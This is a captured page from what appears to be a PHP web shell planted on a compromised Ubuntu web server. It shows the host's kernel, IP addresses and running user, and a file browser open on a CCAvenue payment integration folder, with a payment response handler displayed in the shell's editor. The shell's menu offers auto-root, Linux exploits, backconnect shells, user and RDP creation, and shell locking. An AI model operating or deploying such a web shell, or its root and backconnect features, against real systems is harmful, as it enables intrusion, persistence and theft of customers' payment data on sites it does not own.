Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.149.242.223
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gfgcg /
hdfc /
NON_SEAMLESS_KIT /
[ HOME SHELL ]
Name
Size
Permission
Action
Crypto.php
1.99
KB
-rwxr-xr-x
ccavRequestHandler.php
778
B
-rwxr-xr-x
ccavRequestHandler.php~
778
B
-rwxr-xr-x
ccavResponseHandler.php
1.37
KB
-rwxr-xr-x
dataFrom.htm
4.68
KB
-rwxr-xr-x
dataFrom.htm~
4.69
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ccavResponseHandler.php
<?php include('Crypto.php')?> <?php error_reporting(0); $workingKey=''; //Working Key should be provided here. $encResponse=$_POST["encResp"]; //This is the response sent by the CCAvenue Server $rcvdString=decrypt($encResponse,$workingKey); //Crypto Decryption used as per the specified working key. $order_status=""; $decryptValues=explode('&', $rcvdString); $dataSize=sizeof($decryptValues); echo "<center>"; for($i = 0; $i < $dataSize; $i++) { $information=explode('=',$decryptValues[$i]); if($i==3) $order_status=$information[1]; } if($order_status==="Success") { echo "<br>Thank you for shopping with us. Your credit card has been charged and your transaction is successful. We will be shipping your order to you soon."; } else if($order_status==="Aborted") { echo "<br>Thank you for shopping with us.We will keep you posted regarding the status of your order through e-mail"; } else if($order_status==="Failure") { echo "<br>Thank you for shopping with us.However,the transaction has been declined."; } else { echo "<br>Security Error. Illegal access detected"; } echo "<br><br>"; echo "<table cellspacing=4 cellpadding=4>"; for($i = 0; $i < $dataSize; $i++) { $information=explode('=',$decryptValues[$i]); echo '<tr><td>'.$information[0].'</td><td>'.$information[1].'</td></tr>'; } echo "</table><br>"; echo "</center>"; ?>
Close